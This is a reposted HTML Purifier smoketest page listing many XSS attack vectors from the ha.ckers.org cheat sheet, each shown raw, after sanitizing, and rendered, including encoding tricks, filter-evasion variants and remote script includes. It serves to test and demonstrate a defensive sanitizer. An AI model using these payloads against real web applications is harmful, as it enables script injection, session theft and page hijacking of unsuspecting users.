首页 > Web开发 > 详细

HTML Purifier XSS Attacks Smoketest

时间:2021-09-04 04:30:50      阅读:42      评论:0      收藏:0      [点我收藏+]

HTML Purifier XSS Attacks Smoketest

XSS attacks are from http://ha.ckers.org/xss.html.

Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ?. Some tests are omitted for your convenience. Not all control characters are displayed.

Test

NameRawOutputRender
XSS Locator 
‘;alert(String.fromCharCode( ?
88,83,83))//\‘;alert(String. ?
fromCharCode(88,83,83))//";a ?
lert(String.fromCharCode(88, ?
83,83))//\";alert(String.fro ?
mCharCode(88,83,83))//--></S ?
CRIPT>">‘><SCRIPT>alert(Stri ?
ng.fromCharCode(88,83,83))</ ?
SCRIPT>=&{}
 
‘;alert(String.fromCharCode( ?
88,83,83))//\‘;alert(String. ?
fromCharCode(88,83,83))//";a ?
lert(String.fromCharCode(88, ?
83,83))//\";alert(String.fro ?
mCharCode(88,83,83))//--&gt; ?
"&gt;‘&gt;=&amp;{}
‘;alert(String.fromCharCode(88,83,83))//\‘;alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">‘>=&{}
XSS Quick Test 
‘‘;!--"<XSS>=&{()}
 
‘‘;!--"=&amp;{()}
‘‘;!--"=&{()}
SCRIPT w/Alert() 
<SCRIPT>alert(‘XSS‘)</SCRIPT ?
>
    
SCRIPT w/Source File 
<SCRIPT ?
SRC=http://ha.ckers.org/xss. ?
js></SCRIPT>
    
SCRIPT w/Char Code 
<SCRIPT>alert(String.fromCha ?
rCode(88,83,83))</SCRIPT>
    
BASE 
<BASE ?
HREF="javascript:alert(‘XSS‘ ?
);//">
    
BGSOUND 
<BGSOUND ?
SRC="javascript:alert(‘XSS‘) ?
;">
    
BODY background-image 
<BODY ?
BACKGROUND="javascript:alert ?
(‘XSS‘);">
    
BODY ONLOAD 
<BODY ONLOAD=alert(‘XSS‘)>
    
DIV background-image 1 
<DIV ?
STYLE="background-image: ?
url(javascript:alert(‘XSS‘)) ?
">
 
<div></div>
  
DIV background-image 2 
<DIV ?
STYLE="background-image: ?
url(&#1;javascript:alert(‘XS ?
S‘))">
 
<div></div>
  
DIV expression 
<DIV STYLE="width: ?
expression(alert(‘XSS‘));">
 
<div></div>
  
FRAME 
<FRAMESET><FRAME ?
SRC="javascript:alert(‘XSS‘) ?
;"></FRAMESET>
    
IFRAME 
<IFRAME ?
SRC="javascript:alert(‘XSS‘) ?
;"></IFRAME>
    
INPUT Image 
<INPUT TYPE="IMAGE" ?
SRC="javascript:alert(‘XSS‘) ?
;">
    
IMG w/JavaScript Directive 
<IMG ?
SRC="javascript:alert(‘XSS‘) ?
;">
    
IMG No Quotes/Semicolon 
<IMG ?
SRC=javascript:alert(‘XSS‘)>
    
IMG Dynsrc 
<IMG ?
DYNSRC="javascript:alert(‘XS ?
S‘);">
    
IMG Lowsrc 
<IMG ?
LOWSRC="javascript:alert(‘XS ?
S‘);">
    
IMG Embedded commands 1 
<IMG ?
SRC="http://www.thesiteyouar ?
eon.com/somecommand.php?some ?
variables=maliciouscode">
 
<img ?
src="http://www.thesiteyouar ?
eon.com/somecommand.php?some ?
variables=maliciouscode" ?
alt="somecommand.php?somevar ?
iables=maliciouscode" />
技术分享图片
IMG STYLE w/expression 
exp/*<XSS ?
STYLE=‘no\xss:noxss("*//*"); ?

xss:&#101;x&#x2F;*XSS*//*/* ?
/pression(alert("XSS"))‘>
 
exp/*
exp/*
List-style-image 
<STYLE>li {list-style-image: ?
url("javascript:alert(‘XSS‘) ?
");}</STYLE><UL><LI>XSS
 
<ul><li>XSS</li></ul>
  • XSS
IMG w/VBscript 
<IMG ?
SRC=‘vbscript:msgbox("XSS")‘ ?
>
    
LAYER 
<LAYER ?
SRC="http://ha.ckers.org/scr ?
iptlet.html"></LAYER>
    
Livescript 
<IMG ?
SRC="livescript:[code]">
    
US-ASCII encoding 
scriptalert(XSS)/script ?

scriptalert(XSS)/script
scriptalert(XSS)/script
META 
<META HTTP-EQUIV="refresh" ?
CONTENT="0;url=javascript:al ?
ert(‘XSS‘);">
    
META w/data:URL 
<META HTTP-EQUIV="refresh" ?
CONTENT="0;url=data:text/htm ?
l;base64,PHNjcmlwdD5hbGVydCg ?
nWFNTJyk8L3NjcmlwdD4K">
    
META w/additional URL parameter 
<META HTTP-EQUIV="refresh" ?
CONTENT="0; ?
URL=http://;URL=javascript:a ?
lert(‘XSS‘);">
    
Mocha 
<IMG SRC="mocha:[code]">
    
OBJECT 
<OBJECT ?
TYPE="text/x-scriptlet" ?
DATA="http://ha.ckers.org/sc ?
riptlet.html"></OBJECT>
    
OBJECT w/Embedded XSS 
<OBJECT ?
classid=clsid:ae24fdae-03c6- ?
11d1-8b76-0080c744f389><para ?
m name=url ?
value=javascript:alert(‘XSS‘ ?
)></OBJECT>
    
Embed Flash 
<EMBED ?
SRC="http://ha.ckers.org/xss ?
.swf" ?
AllowScriptAccess="always">< ?
/EMBED>
    
STYLE 
<STYLE ?
TYPE="text/javascript">alert ?
(‘XSS‘);</STYLE>
    
STYLE w/Comment 
<IMG ?
STYLE="xss:expr/*XSS*/ession ?
(alert(‘XSS‘))">
    
STYLE w/Anonymous HTML 
<XSS ?
STYLE="xss:expression(alert( ?
‘XSS‘))">
    
STYLE w/background-image 
<STYLE>.XSS{background-image ?
:url("javascript:alert(‘XSS‘ ?
)");}</STYLE><A ?
CLASS=XSS></A>
 
<a class="XSS"></a>
  
STYLE w/background 
<STYLE ?
type="text/css">BODY{backgro ?
und:url("javascript:alert(‘X ?
SS‘)")}</STYLE>
    
Stylesheet 
<LINK REL="stylesheet" ?
HREF="javascript:alert(‘XSS‘ ?
);">
    
Remote Stylesheet 1 
<LINK REL="stylesheet" ?
HREF="http://ha.ckers.org/xs ?
s.css">
    
Remote Stylesheet 2 
<STYLE>@import‘http://ha.cke ?
rs.org/xss.css‘;</STYLE>
    
Remote Stylesheet 3 
<META HTTP-EQUIV="Link" ?
Content="<http://ha.ckers.or ?
g/xss.css>; REL=stylesheet">
    
Remote Stylesheet 4 
<STYLE>BODY{-moz-binding:url ?
("http://ha.ckers.org/xssmoz ?
.xml#xss")}</STYLE>
    
TABLE 
<TABLE ?
BACKGROUND="javascript:alert ?
(‘XSS‘)"></TABLE>
    
TD 
<TABLE><TD ?
BACKGROUND="javascript:alert ?
(‘XSS‘)"></TD></TABLE>
    
XML namespace 
<HTML xmlns:xss>
<?import ?
namespace="xss" ?
implementation="http://ha.ck ?
ers.org/xss.htc">
<xss:xss>X ?
SS</xss:xss>

</HTML>
 
&lt;?import namespace="xss" ?
implementation="http://ha.ck ?
ers.org/xss.htc"&gt;
XSS
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS
XML data island w/CDATA 
<XML ?
ID=I><X><C><![CDATA[<IMG ?
SRC="javas]]><![CDATA[cript: ?
alert(‘XSS‘);">]]>

</C></X> ?
</xml><SPAN DATASRC=#I ?
DATAFLD=C DATAFORMATAS=HTML>
 
&lt;IMG ?
SRC="javascript:alert(‘XSS‘) ?
;"&gt;

<span></span>
<IMG SRC="javascript:alert(‘XSS‘);">
XML data island w/comment 
<XML ID="xss"><I><B><IMG ?
SRC="javas<!-- ?
-->cript:alert(‘XSS‘)"></B>< ?
/I></XML>

<SPAN ?
DATASRC="#xss" DATAFLD="B" ?
DATAFORMATAS="HTML"></SPAN>
 
<i><b><img src="javas" ?
alt="javas&lt;!-- ?
--&gt;cript:alert(‘XSS‘)" ?
/></b></i><span></span>
技术分享图片
XML (locally hosted) 
<XML ?
SRC="http://ha.ckers.org/xss ?
test.xml" ID=I></XML>
<SPAN ?
DATASRC=#I DATAFLD=C ?
DATAFORMATAS=HTML></SPAN>
 
<span></span>
  
XML HTML+TIME 
<HTML><BODY>
<?xml:namespace ?
prefix="t" ?
ns="urn:schemas-microsoft-co ?
m:time">

<?import ?
namespace="t" ?
implementation="#default#tim ?
e2">
<t:set ?
attributeName="innerHTML" ?
to="XSS<SCRIPT ?
DEFER>alert(‘XSS‘)</SCRIPT>" ?
> </BODY></HTML>
 
&lt;?xml:namespace ?
prefix="t" ?
ns="urn:schemas-microsoft-co ?
m:time"&gt;

&lt;?import ?
namespace="t" ?
implementation="#default#tim ?
e2"&gt;
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2">
Commented-out Block 
<!--[if gte IE ?
4]>
<SCRIPT>alert(‘XSS‘);</S ?
CRIPT>
<![endif]-->
    
Cookie Manipulation 
<META ?
HTTP-EQUIV="Set-Cookie" ?
Content="USERID=<SCRIPT>aler ?
t(‘XSS‘)</SCRIPT>">
    
Local .htc file 
<XSS STYLE="behavior: ?
url(http://ha.ckers.org/xss. ?
htc);">
    
Rename .js to .jpg 
<SCRIPT ?
SRC="http://ha.ckers.org/xss ?
.jpg"></SCRIPT>
    
SSI 
<!--#exec cmd="/bin/echo ?
‘<SCRIPT SRC‘"--><!--#exec ?
cmd="/bin/echo ?
‘=http://ha.ckers.org/xss.js ?
></SCRIPT>‘"-->
    
PHP 
<? ?
echo(‘<SCR)‘;
echo(‘IPT>aler ?
t("XSS")</SCRIPT>‘); ?>
 
&lt;? echo(‘alert("XSS")‘); ?
?&gt;
<? echo(‘alert("XSS")‘); ?>
JavaScript Includes 
<BR SIZE="&{alert(‘XSS‘)}">
 
<br />
 
Character Encoding Example 
<
%3C
&lt
&lt;
&LT
&LT;
&#60 ?

&#060
&#0060

&#00060
&#000 ?
060
&#0000060
&#60;
&#060;
& ?
#0060;
&#00060;
&#000060;
&# ?
0000060;
&#x3c
&#x03c
&#x003 ?
c
&#x0003c
&#x00003c
&#x0000 ?
03c
&#x3c;
&#x03c;

&#x003c; ?

&#x0003c;
&#x00003c;
&#x000 ?
003c;
&#X3c
&#X03c
&#X003c
& ?
#X0003c
&#X00003c
&#X000003c ?

&#X3c;
&#X03c;
&#X003c;
&#X ?
0003c;
&#X00003c;
&#X000003c ?
;
&#x3C

&#x03C
&#x003C
&#x0 ?
003C
&#x00003C
&#x000003C
&# ?
x3C;
&#x03C;
&#x003C;
&#x000 ?
3C;
&#x00003C;
&#x000003C;
& ?
#X3C
&#X03C
&#X003C
&#X0003C ?

&#X00003C
&#X000003C

&#X3C ?
;
&#X03C;
&#X003C;
&#X0003C; ?

&#X00003C;
&#X000003C;
\x3c ?

\x3C
\u003c
\u003C
 
&lt;
%3C
&amp;lt
&lt;
&amp;L ?
T
&amp;LT;
&lt;
&lt;
&lt;

& ?
lt;
&lt;
&lt;
&lt;
&lt;
&lt; ?

&lt;
&lt;
&lt;
&lt;
&lt;
&l ?
t;
&lt;
&lt;
&lt;
&lt;
&lt;
 ?

&lt;
&lt;
&lt;
&lt;
&lt;
&l ?
t;
&lt;
&lt;
&lt;
&lt;
&lt;
 ?
&lt;
&lt;
&lt;
&lt;
&lt;
&lt ?
;

&lt;
&lt;
&lt;
&lt;
&lt;
 ?
&lt;
&lt;
&lt;
&lt;
&lt;
&lt ?
;
&lt;
&lt;
&lt;
&lt;
&lt;
& ?
lt;

&lt;
&lt;
&lt;
&lt;
&lt ?
;
&lt;
\x3c
\x3C
\u003c
\u00 ?
3C
< %3C &lt < &LT &LT; < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Case Insensitive 
<IMG ?
SRC=JaVaScRiPt:alert(‘XSS‘)>
    
HTML Entities 
<IMG ?
SRC=javascript:alert(&quot;X ?
SS&quot;)>
    
Grave Accents 
<IMG ?
SRC=`javascript:alert("RSnak ?
e says, ‘XSS‘")`>
 
<img ?
src="%60javascript%3Aalert(" ?
alt="`javascript:alert(&quot ?
;RSnake" />
技术分享图片
Image w/CharCode 
<IMG ?
SRC=javascript:alert(String. ?
fromCharCode(88,83,83))>
    
UTF-8 Unicode Encoding 
<IMG ?
SRC=&#106;&#97;&#118;&#97;&# ?
115;&#99;&#114;&#105;&#112;& ?
#116;&#58;&#97;&#108;&#101;& ?
#114;&#116;&#40;&#39;&#88;&# ?
83;&#83;&#39;&#41;>
    
Long UTF-8 Unicode w/out Semicolons 
<IMG ?
SRC=&#0000106&#0000097&#0000 ?
118&#0000097&#0000115&#00000 ?
99&#0000114&#0000105&#000011 ?
2&#0000116&#0000058&#0000097 ?
&#0000108&#0000101&#0000114& ?
#0000116&#0000040&#0000039&# ?
0000088&#0000083&#0000083&#0 ?
000039&#0000041>
    
DIV w/Unicode 
<DIV ?
STYLE="background-image:\007 ?
5\0072\006C\0028‘\006a\0061\ ?
0076\0061\0073\0063\0072\006 ?
9\0070\0074\003a\0061\006c\0 ?
065\0072\0074\0028.1027\0058 ?
.1053\0053\0027\0029‘\0029">
 
<div></div>
  
Hex Encoding w/out Semicolons 
<IMG ?
SRC=&#x6A&#x61&#x76&#x61&#x7 ?
3&#x63&#x72&#x69&#x70&#x74&# ?
x3A&#x61&#x6C&#x65&#x72&#x74 ?
&#x28&#x27&#x58&#x53&#x53&#x ?
27&#x29>
    
UTF-7 Encoding 
<HEAD><META ?
HTTP-EQUIV="CONTENT-TYPE" ?
CONTENT="text/html; ?
charset=UTF-7"> ?
</HEAD>+ADw-SCRIPT+AD4-alert ?
(‘XSS‘);+ADw-/SCRIPT+AD4-
 
+ADw-SCRIPT+AD4-alert(‘XSS‘) ?
;+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert(‘XSS‘);+ADw-/SCRIPT+AD4-
Escaping JavaScript escapes 
\";alert(‘XSS‘);//
 
\";alert(‘XSS‘);//
\";alert(‘XSS‘);//
End title tag 
</TITLE><SCRIPT>alert("XSS") ?
;</SCRIPT>
    
STYLE w/broken up JavaScript 
<STYLE>@im\port‘\ja\vasc\rip ?
t:alert("XSS")‘;</STYLE>
    
Embedded Tab 
<IMG ?
SRC="jav\tascript:alert(‘XSS‘ ?
);">
 
<img ?
src="jav%20ascript%3Aalert(‘ ?
XSS‘);" alt="jav ?
ascript:alert(‘XSS‘);" />
技术分享图片
Embedded Encoded Tab 
<IMG ?
SRC="jav&#x09;ascript:alert( ?
‘XSS‘);">
 
<img ?
src="jav%20ascript%3Aalert(‘ ?
XSS‘);" alt="jav ?
ascript:alert(‘XSS‘);" />
技术分享图片
Embedded Newline 
<IMG ?
SRC="jav&#x0A;ascript:alert( ?
‘XSS‘);">
 
<img ?
src="jav%20ascript%3Aalert(‘ ?
XSS‘);" alt="jav ?
ascript:alert(‘XSS‘);" />
技术分享图片
Embedded Carriage Return 
<IMG ?
SRC="jav&#x0D;ascript:alert( ?
‘XSS‘);">
 
<img ?
src="jav%20ascript%3Aalert(‘ ?
XSS‘);" alt="jav ?
ascript:alert(‘XSS‘);" />
技术分享图片
Multiline w/Carriage Returns 
<IMG
SRC
=
"
j
a
v
a
s
c
r
i ?

p
t
:
a
l
e
r
t
(
‘
X
S
S
‘ ?

)
"
>

<img ?
src="j%20a%20v%20a%20s%20c%2 ?
0r%20i%20p%20t%20%3A%20a%20l ?
%20e%20r%20t%20(%20‘%20X%20S ?
%20S%20‘%20)" alt="j a v a s ?
c r i p t : a l e r t ( ‘ X ?
S S ‘ )" />
技术分享图片
Null Chars 1 
<IMG ?
SRC=java\0script:alert("XSS") ?
>
    
Null Chars 2 
&<SCR\0IPT>alert("XSS")</SCR\0 ?
IPT>
 
&amp;
&
Spaces/Meta Chars 
<IMG SRC=" &#14;  ?
javascript:alert(‘XSS‘);">
 
<img src=""  />
技术分享图片
Non-Alpha/Non-Digit 
<SCRIPT/XSS ?
SRC="http://ha.ckers.org/xss ?
.js"></SCRIPT>
    
Non-Alpha/Non-Digit Part 2 
<BODY ?
onload!#$%&()*~+-_.,:;?@[/|\ ?
]^`=alert("XSS")>
    
No Closing Script Tag 
<SCRIPT ?
SRC=http://ha.ckers.org/xss. ?
js
    
Protocol resolution in script tags 
<SCRIPT ?
SRC=//ha.ckers.org/.j>
    
Half-Open HTML/JavaScript 
<IMG ?
SRC="javascript:alert(‘XSS‘) ?
"
    
Double open angle brackets 
<IFRAME ?
SRC=http://ha.ckers.org/scri ?
ptlet.html <
    
Extraneous Open Brackets 
<<SCRIPT>alert("XSS");//<</S ?
CRIPT>
 
&lt;
<
Malformed IMG Tags 
<IMG ?
"""><SCRIPT>alert("XSS")</SC ?
RIPT>">
 
"&gt;
">
No Quotes/Semicolons 
<SCRIPT>a=/XSS/
alert(a.sour ?
ce)</SCRIPT>
    
Evade Regex Filter 1 
<SCRIPT a=">" ?
SRC="http://ha.ckers.org/xss ?
.js"></SCRIPT>
    
Evade Regex Filter 2 
<SCRIPT ="blah" ?
SRC="http://ha.ckers.org/xss ?
.js"></SCRIPT>
    
Evade Regex Filter 3 
<SCRIPT a="blah" ‘‘ ?
SRC="http://ha.ckers.org/xss ?
.js"></SCRIPT>
    
Evade Regex Filter 4 
<SCRIPT "a=‘>‘" ?
SRC="http://ha.ckers.org/xss ?
.js"></SCRIPT>
    
Evade Regex Filter 5 
<SCRIPT a=`>` ?
SRC="http://ha.ckers.org/xss ?
.js"></SCRIPT>
    
Filter Evasion 1 
<SCRIPT>document.write("<SCR ?
I");</SCRIPT>PT ?
SRC="http://ha.ckers.org/xss ?
.js"></SCRIPT>
 
PT ?
SRC="http://ha.ckers.org/xss ?
.js"&gt;
PT SRC="http://ha.ckers.org/xss.js">
Filter Evasion 2 
<SCRIPT a=">‘>" ?
SRC="http://ha.ckers.org/xss ?
.js"></SCRIPT>
    
IP Encoding 
<A ?
HREF="http://66.102.7.147/"> ?
XSS</A>
 
<a ?
href="http://66.102.7.147/"> ?
XSS</a>
XSS
URL Encoding 
<A ?
HREF="http://%77%77%77%2E%67 ?
%6F%6F%67%6C%65%2E%63%6F%6D" ?
>XSS</A>
 
<a>XSS</a>
XSS
Dword Encoding 
<A ?
HREF="http://1113982867/">XS ?
S</A>
 
<a ?
href="http://1113982867/">XS ?
S</a>
XSS
Hex Encoding 
<A ?
HREF="http://0x42.0x0000066. ?
0x7.0x93/">XSS</A>
 
<a ?
href="http://0x42.0x0000066. ?
0x7.0x93/">XSS</a>
XSS
Octal Encoding 
<A ?
HREF="http://0102.0146.0007. ?
00000223/">XSS</A>
 
<a ?
href="http://0102.0146.0007. ?
00000223/">XSS</a>
XSS
Mixed Encoding 
<A ?
HREF="h
tt\tp://6&#09;6.00014 ?
6.0x7.147/">XSS</A>
 
<a ?
href="h%20tt%20p%3A//6%206.0 ?
00146.0x7.147/">XSS</a>
XSS
Protocol Resolution Bypass 
<A ?
HREF="//www.google.com/">XSS ?
</A>
 
<a>XSS</a>
XSS
Firefox Lookups 1 
<A HREF="//google">XSS</A>
 
<a href="//google">XSS</a>
XSS
Firefox Lookups 2 
<A ?
HREF="http://ha.ckers.org@go ?
ogle">XSS</A>
 
<a ?
href="http://google">XSS</a>
XSS
Firefox Lookups 3 
<A ?
HREF="http://google:ha.ckers ?
.org">XSS</A>
 
<a ?
href="http://google">XSS</a>
XSS
Removing Cnames 
<A ?
HREF="http://google.com/">XS ?
S</A>
 
<a>XSS</a>
XSS
Extra dot for Absolute DNS 
<A ?
HREF="http://www.google.com. ?
/">XSS</A>
 
<a>XSS</a>
XSS
JavaScript Link Location 
<A ?
HREF="javascript:document.lo ?
cation=‘http://www.google.co ?
m/‘">XSS</A>
 
<a>XSS</a>
XSS
Content Replace 
<A ?
HREF="http://www.gohttp://ww ?
w.google.com/ogle.com/">XSS< ?
/A>
 
<a ?
href="http://www.gohttp//www ?
.google.com/ogle.com/">XSS</ ?
a>
XSS

 

HTML Purifier XSS Attacks Smoketest

原文:https://www.cnblogs.com/chucklu/p/15222294.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!